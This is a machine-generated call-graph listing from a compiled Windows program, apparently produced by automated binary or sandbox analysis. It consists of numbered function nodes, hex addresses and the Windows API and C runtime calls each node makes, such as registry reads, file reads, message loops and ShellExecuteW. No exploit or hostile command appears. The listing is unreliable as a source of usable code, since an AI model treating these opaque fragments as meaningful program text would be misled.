_free 103826->103839 103827->103811 103829 9b65d3 103840 9c2b5c 26 API calls __cftof 103829->103840 103831 9b65de 103831->103811 103832->103814 103833->103824 103834->103817 103835->103817 103836->103820 103837->103822 103838->103824 103839->103829 103840->103831 103842 a018b6 103841->103842 103843 9b014b 8 API calls 103842->103843 103844 a018bd 103843->103844 103847 9ffcb5 103844->103847 103846 a018f7 103846->103375 103848 99c2c9 8 API calls 103847->103848 103849 9ffcc8 CharLowerBuffW 103848->103849 103851 9ffcdb 103849->103851 103850 99655e 8 API calls 103850->103851 103851->103850 103852 9ffd19 103851->103852 103864 9ffce5 ___scrt_fastfail 103851->103864 103853 9ffd2b 103852->103853 103854 99655e 8 API calls 103852->103854 103855 9b017b 8 API calls 103853->103855 103854->103853 103859 9ffd59 103855->103859 103856 9ffd7b 103865 9ffe0c 103856->103865 103859->103856 103880 9ffbed 8 API calls 103859->103880 103860 9ffdb8 103861 9b014b 8 API calls 103860->103861 103860->103864 103862 9ffdd2 103861->103862 103863 9b017b 8 API calls 103862->103863 103863->103864 103864->103846 103866 99bf73 8 API calls 103865->103866 103867 9ffe3e 103866->103867 103868 99bf73 8 API calls 103867->103868 103869 9ffe47 103868->103869 103870 99bf73 8 API calls 103869->103870 103874 9ffe50 103870->103874 103871 998577 8 API calls 103871->103874 103872 a00114 103872->103860 103873 9b66f8 GetStringTypeW 103873->103874 103874->103871 103874->103872 103874->103873 103876 9b6641 39 API calls 103874->103876 103877 9ffe0c 40 API calls 103874->103877 103878 99ad40 8 API calls 103874->103878 103879 99bed9 8 API calls 103874->103879 103881 9b6722 GetStringTypeW _strftime 103874->103881 103876->103874 103877->103874 103878->103874 103879->103874 103880->103859 103881->103874 103882->103384 103883->103390 103884->103402 103885->103390 103886->103417 103887->103390 103888->103254 103889->103254 103890->103250 103891->103255 103892 9a0ebf 103893 9a0ed3 103892->103893 103899 9a1425 103892->103899 103894 9a0ee5 103893->103894 103895 9b014b 8 API calls 103893->103895 103896 9e562c 103894->103896 103897 99b4c8 8 API calls 103894->103897 103898 9a0f3e 103894->103898 103895->103894 103926 a01b14 8 API calls 103896->103926 103897->103894 103901 9a2b20 280 API calls 103898->103901 103917 9a049d messages 103898->103917 103899->103894 103902 99bed9 8 API calls 103899->103902 103924 9a0376 messages 103901->103924 103902->103894 103903 9e632b 103930 a03fe1 81 API calls __wsopen_s 103903->103930 103905 9a1695 103912 99bed9 8 API calls 103905->103912 103905->103917 103907 9e625a 103929 a03fe1 81 API calls __wsopen_s 103907->103929 103908 99bed9 8 API calls 103908->103924 103909 9e5cdb 103914 99bed9 8 API calls 103909->103914 103909->103917 103912->103917 103913 9a1990 280 API calls 103913->103924 103914->103917 103915 9b05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103915->103924 103916 99bf73 8 API calls 103916->103924 103918 9b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103918->103924 103919 9e6115 103927 a03fe1 81 API calls __wsopen_s 103919->103927 103921 9b0413 29 API calls pre_c_initialization 103921->103924 103922 9b014b 8 API calls 103922->103924 103923 9a0aae messages 103928 a03fe1 81 API calls __wsopen_s 103923->103928 103924->103903 103924->103905 103924->103907 103924->103908 103924->103909 103924->103913 103924->103915 103924->103916 103924->103917 103924->103918 103924->103919 103924->103921 103924->103922 103924->103923 103925 9a1e50 40 API calls messages 103924->103925 103925->103924 103926->103917 103927->103923 103928->103917 103929->103917 103930->103917 103931 99f4dc 103934 99cab0 103931->103934 103935 99cacb 103934->103935 103936 9e14be 103935->103936 103937 9e150c 103935->103937 103963 99caf0 103935->103963 103940 9e14c8 103936->103940 103941 9e14d5 103936->103941 103936->103963 103978 a162ff 280 API calls 2 library calls 103937->103978 103976 a16790 280 API calls 103940->103976 103960 99cdc0 103941->103960 103977 a16c2d 280 API calls 2 library calls 103941->103977 103943 9abc58 8 API calls 103943->103963 103947 99cf80 39 API calls 103947->103963 103948 9ae807 39 API calls 103948->103963 103949 9e179f 103949->103949 103952 9e16e8 103980 a16669 81 API calls 103952->103980 103956 99cdee 103959 99b4c8 8 API calls 103959->103963 103960->103956 103981 a03fe1 81 API calls __wsopen_s 103960->103981 103961 9a0340 280 API calls 103961->103963 103962 99bed9 8 API calls 103962->103963 103963->103943 103963->103947 103963->103948 103963->103952 103963->103956 103963->103959 103963->103960 103963->103961 103963->103962 103965 99be2d 103963->103965 103969 9ae7c1 39 API calls 103963->103969 103970 9aaa99 280 API calls 103963->103970 103971 9b05b2 5 API calls __Init_thread_wait 103963->103971 103972 9b0413 29 API calls __onexit 103963->103972 103973 9b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103963->103973 103974 9af4df 81 API calls 103963->103974 103975 9af346 280 API calls 103963->103975 103979 9effaf 8 API calls 103963->103979 103966 99be38 103965->103966 103967 99be67 103966->103967 103982 99bfa5 39 API calls 103966->103982 103967->103963 103969->103963 103970->103963 103971->103963 103972->103963 103973->103963 103974->103963 103975->103963 103976->103941 103977->103960 103978->103963 103979->103963 103980->103960 103981->103949 103982->103967 103983 9c947a 103984 9c9487 103983->103984 103987 9c949f 103983->103987 104040 9bf649 20 API calls _free 103984->104040 103986 9c948c 104041 9c2b5c 26 API calls __cftof 103986->104041 103989 9c94fa 103987->103989 103990 9c9497 103987->103990 104042 9d0144 21 API calls 2 library calls 103987->104042 104003 9bdcc5 103989->104003 103993 9c9512 104010 9c8fb2 103993->104010 103995 9c9519 103995->103990 103996 9bdcc5 __fread_nolock 26 API calls 103995->103996 103997 9c9545 103996->103997 103997->103990 103998 9bdcc5 __fread_nolock 26 API calls 103997->103998 103999 9c9553 103998->103999 103999->103990 104000 9bdcc5 __fread_nolock 26 API calls 103999->104000 104001 9c9563 104000->104001 104002 9bdcc5 __fread_nolock 26 API calls 104001->104002 104002->103990 104004 9bdcd1 104003->104004 104005 9bdce6 104003->104005 104043 9bf649 20 API calls _free 104004->104043 104005->103993 104007 9bdcd6 104044 9c2b5c 26 API calls __cftof 104007->104044 104009 9bdce1 104009->103993 104011 9c8fbe __FrameHandler3::FrameUnwindToState 104010->104011 104012 9c8fde 104011->104012 104013 9c8fc6 104011->104013 104015 9c90a4 104012->104015 104020 9c9017 104012->104020 104111 9bf636 20 API calls _free 104013->104111 104118 9bf636 20 API calls _free 104015->104118 104017 9c8fcb 104112 9bf649 20 API calls _free 104017->104112 104018 9c90a9 104119 9bf649 20 API calls _free 104018->104119 104021 9c903b 104020->104021 104022 9c9026 104020->104022 104045 9c54ba EnterCriticalSection 104021->104045 104113 9bf636 20 API calls _free 104022->104113 104026 9c9033 104120 9c2b5c 26 API calls __cftof 104026->104120 104027 9c902b 104114 9bf649 20 API calls _free 104027->104114 104028 9c9041 104030 9c905d 104028->104030 104031 9c9072 104028->104031 104115 9bf649 20 API calls _free 104030->104115 104046 9c90c5 104031->104046 104034 9c8fd3 __fread_nolock 104034->103995 104036 9c9062 104116 9bf636 20 API calls _free 104036->104116 104037 9c906d 104117 9c909c LeaveCriticalSection __wsopen_s 104037->104117 104040->103986 104041->103990 104042->103989 104043->104007 104044->104009 104045->104028 104047 9c90ef 104046->104047 104048 9c90d7 104046->104048 104050 9c9459 104047->104050 104055 9c9134 104047->104055 104137 9bf636 20 API calls _free 104048->104137 104160 9bf636 20 API calls _free 104050->104160 104051 9c90dc 104138 9bf649 20 API calls _free 104051->104138 104054 9c945e 104161 9bf649 20 API calls _free 104054->104161 104056 9c90e4 104055->104056 104058 9c913f 104055->104058 104063 9c916f 104055->104063 104056->104037 104139 9bf636 20 API calls _free 104058->104139 104059 9c914c 104162 9c2b5c 26 API calls __cftof 104059->104162 104061 9c9144 104140 9bf649 20 API calls _free 104061->104140 104065 9c9188 104063->104065 104066 9c91ae 104063->104066 104067 9c91ca 104063->104067 104065->104066 104099 9c9195 104065->104099 104141 9bf636 20 API calls _free 104066->104141 104121 9c3b93 104067->104121 104070 9c91b3 104142 9bf649 20 API calls _free 104070->104142 104075 9c9333 104078 9c93a9 104075->104078 104080 9c934c GetConsoleMode 104075->104080 104076 9c91ba 104143 9c2b5c 26 API calls __cftof 104076->104143 104077 9c91ea 104081 9c2d38 _free 20 API calls 104077->104081 104082 9c93ad ReadFile 104078->104082 104080->104078 104083 9c935d 104080->104083 104084 9c91f1 104081->104084 104085 9c93c7 104082->104085 104086 9c9421 GetLastError 104082->104086 104083->104082 104087 9c9363 ReadConsoleW 104083->104087 104088 9c91fb 104084->104088 104089 9c9216 104084->104089 104085->104086 104092 9c939e 104085->104092 104090 9c942e 104086->104090 104091 9c9385 104086->104091 104087->104092 104094 9c937f GetLastError 104087->104094 104150 9bf649 20 API calls _free 104088->104150 104152 9c97a4 104089->104152 104158 9bf649 20 API calls _free 104090->104158 104108 9c91c5 __fread_nolock 104091->104108 104155 9bf613 20 API calls 2 library calls 104091->104155 104103 9c93ec 104092->104103 104104 9c9403 104092->104104 104092->104108 104094->104091 104095 9c2d38 _free 20 API calls 104095->104056 104098 9c9433 104159 9bf636 20 API calls _free 104098->104159 104128 9cfc1b 104099->104128 104101 9c9200 104151 9bf636 20 API calls _free 104101->104151 104156 9c8de1 31 API calls 4 library calls 104103->104156 104107 9c941a 104104->104107 104104->104108 104157 9c8c21 29 API calls __wsopen_s 104107->104157 104108->104095 104110 9c941f 104110->104108 104111->104017 104112->104034 104113->104027 104114->104026 104115->104036 104116->104037 104117->104034 104118->104018 104119->104026 104120->104034 104122 9c3bd1 104121->104122 104126 9c3ba1 _abort 104121->104126 104164 9bf649 20 API calls _free 104122->104164 104123 9c3bbc RtlAllocateHeap 104125 9c3bcf 104123->104125 104123->104126 104144 9c2d38 104125->104144 104126->104122 104126->104123 104163 9b521d 7 API calls 2 library calls 104126->104163 104129 9cfc28 104128->104129 104130 9cfc35 104128->104130 104165 9bf649 20 API calls _free 104129->104165 104132 9cfc41 104130->104132 104166 9bf649 20 API calls _free 104130->104166 104132->104075 104134 9cfc2d 104134->104075 104135 9cfc62 104167 9c2b5c 26 API calls __cftof 104135->104167 104137->104051 104138->104056 104139->104061 104140->104059 104141->104070 104142->104076 104143->104108 104145 9c2d43 RtlFreeHeap 104144->104145 104149 9c2d6c _free 104144->104149 104146 9c2d58 104145->104146 104145->104149 104168 9bf649 20 API calls _free 104146->104168 104148 9c2d5e GetLastError 104148->104149 104149->104077 104150->104101 104151->104108 104169 9c970b 104152->104169 104155->104108 104156->104108 104157->104110 104158->104098 104159->104108 104160->104054 104161->104059 104162->104056 104163->104126 104164->104125 104165->104134 104166->104135 104167->104134 104168->104148 104178 9c5737 104169->104178 104171 9c971d 104172 9c9725 104171->104172 104173 9c9736 SetFilePointerEx 104171->104173 104191 9bf649 20 API calls _free 104172->104191 104175 9c972a 104173->104175 104176 9c974e GetLastError 104173->104176 104175->104099 104192 9bf613 20 API calls 2 library calls 104176->104192 104179 9c5759 104178->104179 104180 9c5744 104178->104180 104185 9c577e 104179->104185 104195 9bf636 20 API calls _free 104179->104195 104193 9bf636 20 API calls _free 104180->104193 104183 9c5749 104194 9bf649 20 API calls _free 104183->104194 104185->104171 104186 9c5789 104196 9bf649 20 API calls _free 104186->104196 104187 9c5751 104187->104171 104189 9c5791 104197 9c2b5c 26 API calls __cftof 104189->104197 104191->104175 104192->104175 104193->104183 104194->104187 104195->104186 104196->104189 104197->104187 104198 991033 104203 9968b4 104198->104203 104202 991042 104204 99bf73 8 API calls 104203->104204 104205 996922 104204->104205 104211 99589f 104205->104211 104208 9969bf 104209 991038 104208->104209 104214 996b14 8 API calls __fread_nolock 104208->104214 104210 9b0413 29 API calls __onexit 104209->104210 104210->104202 104215 9958cb 104211->104215 104214->104208 104216 9958d8 104215->104216 104217 9958be 104215->104217 104216->104217 104218 9958df RegOpenKeyExW 104216->104218 104217->104208 104218->104217 104219 9958f9 RegQueryValueExW 104218->104219 104220 99591a 104219->104220 104221 99592f RegCloseKey 104219->104221 104220->104221 104221->104217 104222 9936f5 104225 99370f 104222->104225 104226 993726 104225->104226 104227 99372b 104226->104227 104228 99378a 104226->104228 104229 993788 104226->104229 104232 993738 104227->104232 104233 993804 PostQuitMessage 104227->104233 104230 9d3df4 104228->104230 104231 993790 104228->104231 104234 99376f DefWindowProcW 104229->104234 104280 992f92 10 API calls 104230->104280 104235 9937bc SetTimer RegisterWindowMessageW 104231->104235 104236 993797 104231->104236 104237 993743 104232->104237 104238 9d3e61 104232->104238 104240 993709 104233->104240 104234->104240 104235->104240 104243 9937e5 CreatePopupMenu 104235->104243 104241 9d3d95 104236->104241 104242 9937a0 KillTimer 104236->104242 104244 99374d 104237->104244 104245 99380e 104237->104245 104283 9fc8f7 65 API calls ___scrt_fastfail 104238->104283 104248 9d3d9a 104241->104248 104249 9d3dd0 MoveWindow 104241->104249 104250 993907 Shell_NotifyIconW 104242->104250 104243->104240 104251 993758 104244->104251 104252 9d3e46 104244->104252 104270 9afcad 104245->104270 104247 9d3e15 104281 9af23c 40 API calls 104247->104281 104256 9d3dbf SetFocus 104248->104256 104257 9d3da0 104248->104257 104249->104240 104258 9937b3 104250->104258 104259 993763 104251->104259 104260 9937f2 104251->104260 104252->104234 104282 9f1423 8 API calls 104252->104282 104253 9d3e73 104253->104234 104253->104240 104256->104240 104257->104259 104261 9d3da9 104257->104261 104277 9959ff DeleteObject DestroyWindow 104258->104277 104259->104234 104267 993907 Shell_NotifyIconW 104259->104267 104278 99381f 75 API calls ___scrt_fastfail 104260->104278 104279 992f92 10 API calls 104261->104279 104266 993802 104266->104240 104268 9d3e3a 104267->104268 104269 99396b 60 API calls 104268->104269 104269->104229 104271 9afd4b 104270->104271 104272 9afcc5 ___scrt_fastfail 104270->104272 104271->104240 104273 9961a9 55 API calls 104272->104273 104275 9afcec 104273->104275 104274 9afd34 KillTimer SetTimer 104274->104271 104275->104274 104276 9efe2b Shell_NotifyIconW 104275->104276 104276->104274 104277->104240 104278->104266 104279->104240 104280->104247 104281->104259 104282->104229 104283->104253 104284 9e5050 104288 a01a7f 104284->104288 104286 9e505b 104287 a01a7f 52 API calls 104286->104287 104287->104286 104289 a01a8c 104288->104289 104295 a01ab9 104288->104295 104290 a01abb 104289->104290 104292 a01ac0 104289->104292 104289->104295 104297 a01ab3 104289->104297 104300 9afd71 52 API calls 104290->104300 104293 998ec0 52 API calls 104292->104293 104294 a01ac7 104293->104294 104296 997bb5 8 API calls 104294->104296 104295->104286 104296->104295 104299 99c520 39 API calls 104297->104299 104299->104295 104300->104292 104301 9e5650 104310 9ae3d5 104301->104310 104303 9e5666 104308 9e56e1 104303->104308 104319 9aaa65 9 API calls 104303->104319 104306 9e61d7 104307 9e56c1 104307->104308 104320 a0247e 8 API calls 104307->104320 104308->104306 104321 a03fe1 81 API calls __wsopen_s 104308->104321 104311 9ae3e3 104310->104311 104312 9ae3f6 104310->104312 104313 99b4c8 8 API calls 104311->104313 104314 9ae3fb 104312->104314 104315 9ae429 104312->104315 104318 9ae3ed 104313->104318 104316 9b014b 8 API calls 104314->104316 104317 99b4c8 8 API calls 104315->104317 104316->104318 104317->104318 104318->104303 104319->104307 104320->104308 104321->104306 104322 9b076b 104323 9b0777 __FrameHandler3::FrameUnwindToState 104322->104323 104352 9b0221 104323->104352 104325 9b077e 104326 9b08d1 104325->104326 104329 9b07a8 104325->104329 104393 9b0baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 104326->104393 104328 9b08d8 104386 9b51c2 104328->104386 104341 9b07e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 104329->104341 104363 9c27ed 104329->104363 104336 9b07c7 104338 9b0848 104371 9b0cc9 104338->104371 104340 9b084e 104375 99331b 104340->104375 104341->104338 104389 9b518a 38 API calls 2 library calls 104341->104389 104346 9b086a 104346->104328 104347 9b086e 104346->104347 104348 9b0877 104347->104348 104391 9b5165 28 API calls _abort 104347->104391 104392 9b03b0 13 API calls 2 library calls 104348->104392 104351 9b087f 104351->104336 104353 9b022a 104352->104353 104395 9b0a08 IsProcessorFeaturePresent 104353->104395 104355 9b0236 104396 9b3004 10 API calls 3 library calls 104355->104396 104357 9b023b 104362 9b023f 104357->104362 104397 9c2687 104357->104397 104360 9b0256 104360->104325 104362->104325 104365 9c2804 104363->104365 104364 9b0dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 104366 9b07c1 104364->104366 104365->104364 104366->104336 104367 9c2791 104366->104367 104370 9c27c0 104367->104370 104368 9b0dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 104369 9c27e9 104368->104369 104369->104341 104370->104368 104465 9b26b0 104371->104465 104374 9b0cef 104374->104340 104376 993327 IsThemeActive 104375->104376 104377 993382 104375->104377 104467 9b52b3 104376->104467 104390 9b0d02 GetModuleHandleW 104377->104390 104379 993352 104473 9b5319 104379->104473 104381 993359 104480 9932e6 SystemParametersInfoW SystemParametersInfoW 104381->104480 104383 993360 104481 99338b 104383->104481 104385 993368 SystemParametersInfoW 104385->104377 105242 9b4f3f 104386->105242 104389->104338 104390->104346 104391->104348 104392->104351 104393->104328 104395->104355 104396->104357 104401 9cd576 104397->104401 104400 9b302d 8 API calls 3 library calls 104400->104362 104404 9cd593 104401->104404 104405 9cd58f 104401->104405 104403 9b0248 104403->104360 104403->104400 104404->104405 104407 9c4f6e 104404->104407 104419 9b0dfc 104405->104419 104408 9c4f7a __FrameHandler3::FrameUnwindToState 104407->104408 104426 9c32d1 EnterCriticalSection 104408->104426 104410 9c4f81 104427 9c5422 104410->104427 104412 9c4f90 104418 9c4f9f 104412->104418 104440 9c4e02 29 API calls 104412->104440 104415 9c4f9a 104441 9c4eb8 GetStdHandle GetFileType 104415->104441 104417 9c4fb0 __fread_nolock 104417->104404 104442 9c4fbb LeaveCriticalSection _abort 104418->104442 104420 9b0e07 IsProcessorFeaturePresent 104419->104420 104421 9b0e05 104419->104421 104423 9b0fce 104420->104423 104421->104403 104464 9b0f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 104423->104464 104425 9b10b1 104425->104403 104426->104410 104428 9c542e __FrameHandler3::FrameUnwindToState 104427->104428 104429 9c543b 104428->104429 104430 9c5452 104428->104430 104451 9bf649 20 API calls _free 104429->104451 104443 9c32d1 EnterCriticalSection 104430->104443 104433 9c5440 104452 9c2b5c 26 API calls __cftof 104433->104452 104435 9c548a 104453 9c54b1 LeaveCriticalSection _abort 104435->104453 104436 9c544a __fread_nolock 104436->104412 104437 9c545e 104437->104435 104444 9c5373 104437->104444 104440->104415 104441->104418 104442->104417 104443->104437 104454 9c4ff0 104444->104454 104446 9c5385 104450 9c5392 104446->104450 104461 9c3778 11 API calls 2 library calls 104446->104461 104447 9c2d38 _free 20 API calls 104449 9c53e4 104447->104449 104449->104437 104450->104447 104451->104433 104452->104436 104453->104436 104460 9c4ffd _abort 104454->104460 104455 9c503d 104463 9bf649 20 API calls _free 104455->104463 104456 9c5028 RtlAllocateHeap 104457 9c503b 104456->104457 104456->104460 104457->104446 104460->104455 104460->104456 104462 9b521d 7 API calls 2 library calls 104460->104462 104461->104446 104462->104460 104463->104457 104464->104425 104466 9b0cdc GetStartupInfoW 104465->104466 104466->104374 104468 9b52bf __FrameHandler3::FrameUnwindToState 104467->104468 104530 9c32d1 EnterCriticalSection 104468->104530 104470 9b52ca pre_c_initialization 104531 9b530a 104470->104531 104472 9b52ff __fread_nolock 104472->104379 104474 9b533f 104473->104474 104475 9b5325 104473->104475 104474->104381 104475->104474 104535 9bf649 20 API calls _free 104475->104535 104477 9b532f 104536 9c2b5c 26 API calls __cftof 104477->104536 104479 9b533a 104479->104381 104480->104383 104482 99339b __wsopen_s 104481->104482 104483 99bf73 8 API calls 104482->104483 104484 9933a7 GetCurrentDirectoryW 104483->104484 104537 994fd9 104484->104537 104486 9933ce IsDebuggerPresent 104487 9933dc 104486->104487 104488 9d3ca3 MessageBoxA 104486->104488 104489 9d3cbb 104487->104489 104490 9933f0 104487->104490 104488->104489 104641 994176 8 API calls 104489->104641 104605 993a95 104490->104605 104497 993462 104499 9d3cec SetCurrentDirectoryW 104497->104499 104500 99346a 104497->104500 104499->104500 104501 993475 104500->104501 104642 9f1fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 104500->104642 104637 9934d3 7 API calls 104501->104637 104504 9d3d07 104504->104501 104507 9d3d19 104504->104507 104509 995594 10 API calls 104507->104509 104508 99347f 104510 99396b 60 API calls 104508->104510 104514 993494 104508->104514 104511 9d3d22 104509->104511 104510->104514 104512 99b329 8 API calls 104511->104512 104513 9d3d30 104512->104513 104516 9d3d5f 104513->104516 104517 9d3d38 104513->104517 104515 9934af 104514->104515 104518 993907 Shell_NotifyIconW 104514->104518 104521 9934b6 SetCurrentDirectoryW 104515->104521 104520 996b7c 8 API calls 104516->104520 104519 996b7c 8 API calls 104517->104519 104518->104515 104522 9d3d43 104519->104522 104529 9d3d5b GetForegroundWindow ShellExecuteW 104520->104529 104525 9934ca 104521->104525 104523 997bb5 8 API calls 104522->104523 104526 9d3d51 104523->104526 104525->104385 104528 996b7c 8 API calls 104526->104528 104527 9d3d90 104527->104515 104528->104529 104529->104527 104530->104470 104534 9c3319 LeaveCriticalSection 104531->104534 104533 9b5311 104533->104472 104534->104533 104535->104477 104536->104479 104538 99bf73 8 API calls 104537->104538 104539 994fef 104538->104539 104643 9963d7 104539->104643 104541 99500d 104542 99bd57 8 API calls 104541->104542 104543 995021 104542->104543 104544 99bed9 8 API calls 104543->104544 104545 99502c 104544->104545 104657 99893c 104545->104657 104548 99b329 8 API calls 104549 995045 104548->104549 104550 99be2d 39 API calls 104549->104550 104551 995055 104550->104551 104552 99b329 8 API calls 104551->104552 104553 99507b 104552->104553 104554 99be2d 39 API calls 104553->104554 104555 99508a 104554->104555 104556 99bf73 8 API calls 104555->104556 104557 9950a8 104556->104557 104660 9951ca 104557->104660 104560 9b4d98 _strftime 40 API calls 104561 9950c2 104560->104561 104562 9950cc 104561->104562 104563 9d4b23 104561->104563 104564 9b4d98 _strftime 40 API calls 104562->104564 104565 9951ca 8 API calls 104563->104565 104567 9950d7 104564->104567 104566 9d4b37 104565->104566 104569 9951ca 8 API calls 104566->104569 104567->104566 104568 9950e1 104567->104568 104570 9b4d98 _strftime 40 API calls 104568->104570 104571 9d4b53 104569->104571 104572 9950ec 104570->104572 104574 995594 10 API calls 104571->104574 104572->104571 104573 9950f6 104572->104573 104575 9b4d98 _strftime 40 API calls 104573->104575 104576 9d4b76 104574->104576 104577 995101 104575->104577 104578 9951ca 8 API calls 104576->104578 104579 99510b 104577->104579 104580 9d4b9f 104577->104580 104583 9d4b82 104578->104583 104581 99512e 104579->104581 104584 99bed9 8 API calls 104579->104584 104582 9951ca 8 API calls 104580->104582 104586 9d4bda 104581->104586 104590 997e12 8 API calls 104581->104590 104585 9d4bbd 104582->104585 104587 99bed9 8 API calls 104583->104587 104588 995121 104584->104588 104589 99bed9 8 API calls 104585->104589 104591 9d4b90 104587->104591 104592 9951ca 8 API calls 104588->104592 104593 9d4bcb 104589->104593 104594 99513e 104590->104594 104595 9951ca 8 API calls 104591->104595 104592->104581 104596 9951ca 8 API calls 104593->104596 104597 998470 8 API calls 104594->104597 104595->104580 104596->104586 104598 99514c 104597->104598 104666 998a60 104598->104666 104600 99893c 8 API calls 104602 995167 104600->104602 104601 998a60 8 API calls 104601->104602 104602->104600 104602->104601 104603 9951ab 104602->104603 104604 9951ca 8 API calls 104602->104604 104603->104486 104604->104602 104606 993aa2 __wsopen_s 104605->104606 104607 993abb 104606->104607 104608 9d40da ___scrt_fastfail 104606->104608 104609 995851 9 API calls 104607->104609 104611 9d40f6 GetOpenFileNameW 104608->104611 104610 993ac4 104609->104610 104678 993a57 104610->104678 104613 9d4145 104611->104613 104615 998577 8 API calls 104613->104615 104617 9d415a 104615->104617 104617->104617 105241 993624 7 API calls 104637->105241 104639 99347a 104640 9935b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104639->104640 104640->104508 104641->104497 104642->104504 104644 9963e4 __wsopen_s 104643->104644 104645 998577 8 API calls 104644->104645 104646 996416 104644->104646 104645->104646 104647 99655e 8 API calls 104646->104647 104656 99644c 104646->104656 104647->104646 104648 99655e 8 API calls 104648->104656 104649 99b329 8 API calls 104650 996543 104649->104650 104652 996a7c 8 API calls 104650->104652 104651 99b329 8 API calls 104651->104656 104653 99654f 104652->104653 104653->104541 104654 996a7c 8 API calls 104654->104656 104655 99651a 104655->104649 104655->104653 104656->104648 104656->104651 104656->104654 104656->104655 104658 9b014b 8 API calls 104657->104658 104659 995038 104658->104659 104659->104548 104661 9951f2 104660->104661 104662 9951d4 104660->104662 104663 998577 8 API calls 104661->104663 104664 9950b4 104662->104664 104665 99bed9 8 API calls 104662->104665 104663->104664 104664->104560 104665->104664 104667 998a76 104666->104667 104668 9d6737 104667->104668 104673 998a80 104667->104673 104677 9ab7a2 8 API calls 104668->104677 104669 9d6744 104671 99b4c8 8 API calls 104669->104671 104672 9d6762 104671->104672 104672->104672 104673->104669 104674 998b94 104673->104674 104676 998b9b 104673->104676 104675 9b014b 8 API calls 104674->104675 104675->104676 104676->104602 104677->104669 104679 9d22d0 __wsopen_s 104678->104679 104680 993a64 GetLongPathNameW 104679->104680 104681 998577 8 API calls 104680->104681 104682 993a8c 104681->104682 104683 9953f2 104682->104683 104684 99bf73 8 API calls 104683->104684 104685 995404 104684->104685 104686 995851 9 API calls 104685->104686 104687 99540f 104686->104687 104688 99541a 104687->104688 104689 9d4d5b 104687->104689 104691 996a7c 8 API calls 104688->104691 104693 9d4d7d 104689->104693 104732 9ae36b 41 API calls 104689->104732 104692 995426 104691->104692 104726 991340 104692->104726 104727 991352 104726->104727 104731 991371 __fread_nolock 104726->104731 104730 9b017b 8 API calls 104727->104730 104728 9b014b 8 API calls 104730->104731 104731->104728 104732->104689 105241->104639 105243 9b4f4b _abort 105242->105243 105244 9b4f52 105243->105244 105245 9b4f64 105243->105245 105281 9b5099 GetModuleHandleW 105244->105281 105266 9c32d1 EnterCriticalSection 105245->105266 105248 9b4f57 105248->105245 105282 9b50dd GetModuleHandleExW 105248->105282 105249 9b4f6b 105253 9b4fe0 105249->105253 105263 9b5009 105249->105263 105267 9c2518 105249->105267 105257 9b4ff8 105253->105257 105262 9c2791 _abort 5 API calls 105253->105262 105255 9b5052 105290 9d20a9 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 105255->105290 105256 9b5026 105273 9b5058 105256->105273 105258 9c2791 _abort 5 API calls 105257->105258 105258->105263 105262->105257 105270 9b5049 105263->105270 105266->105249 105291 9c2251 105267->105291 105310 9c3319 LeaveCriticalSection 105270->105310 105272 9b5022 105272->105255 105272->105256 105311 9c397f 105273->105311 105276 9b5086 105279 9b50dd _abort 8 API calls 105276->105279 105277 9b5066 GetPEB 105277->105276 105278 9b5076 GetCurrentProcess TerminateProcess 105277->105278 105278->105276 105280 9b508e ExitProcess 105279->105280 105281->105248 105283 9b512a 105282->105283 105284 9b5107 GetProcAddress 105282->105284 105285 9b5139 105283->105285 105286 9b5130 FreeLibrary 105283->105286 105287 9b511c 105284->105287 105288 9b0dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 105285->105288 105286->105285 105287->105283 105289 9b4f63 105288->105289 105289->105245 105294 9c2200 105291->105294 105293 9c2275 105293->105253 105295 9c220c __FrameHandler3::FrameUnwindToState 105294->105295 105302 9c32d1 EnterCriticalSection 105295->105302 105297 9c221a 105303 9c22a1 105297->105303 105301 9c2238 __fread_nolock 105301->105293 105302->105297 105306 9c22c1 105303->105306 105307 9c22c9 105303->105307 105304 9b0dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 105305 9c2227 105304->105305 105309 9c2245 LeaveCriticalSection _abort 105305->105309 105306->105304 105307->105306 105308 9c2d38 _free 20 API calls 105307->105308 105308->105306 105309->105301 105310->105272 105312 9c399a 105311->105312 105313 9c39a4 105311->105313 105315 9b0dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 105312->105315 105318 9c334a 5 API calls 2 library calls 105313->105318 105316 9b5062 105315->105316 105316->105276 105316->105277 105317 9c39bb 105317->105312 105318->105317 105319 9e400f 105335 99eeb0 messages 105319->105335 105320 99f211 PeekMessageW 105320->105335 105321 99ef07 GetInputState 105321->105320 105321->105335 105323 9e32cd TranslateAcceleratorW 105323->105335 105324 99f28f PeekMessageW 105324->105335 105325 99f104 timeGetTime 105325->105335 105326 99f273 TranslateMessage DispatchMessageW 105326->105324 105327 99f2af Sleep 105327->105335 105328 9e4183 Sleep 105340 9e4060 105328->105340 105330 9e33e9 timeGetTime 105397 9aaa65 9 API calls 105330->105397 105332 9fdd87 46 API calls 105332->105340 105334 9e421a GetExitCodeProcess 105336 9e4246 CloseHandle 105334->105336 105337 9e4230 WaitForSingleObject 105334->105337 105335->105320 105335->105321 105335->105323 105335->105324 105335->105325 105335->105326 105335->105327 105335->105328 105335->105330 105335->105340 105341 99f0d5 105335->105341 105348 9a0340 280 API calls 105335->105348 105349 9a2b20 280 API calls 105335->105349 105351 99f450 105335->105351 105358 99f6d0 105335->105358 105381 9ae915 105335->105381 105386 9ff292 105335->105386 105396 9af215 timeGetTime 105335->105396 105398 a0446f 8 API calls 105335->105398 105399 a03fe1 81 API calls __wsopen_s 105335->105399 105400 a160b5 8 API calls 105335->105400 105336->105340 105337->105335 105337->105336 105338 a2345b GetForegroundWindow 105338->105340 105340->105332 105340->105334 105340->105335 105340->105338 105342 9e3d51 105340->105342 105343 9e42b8 Sleep 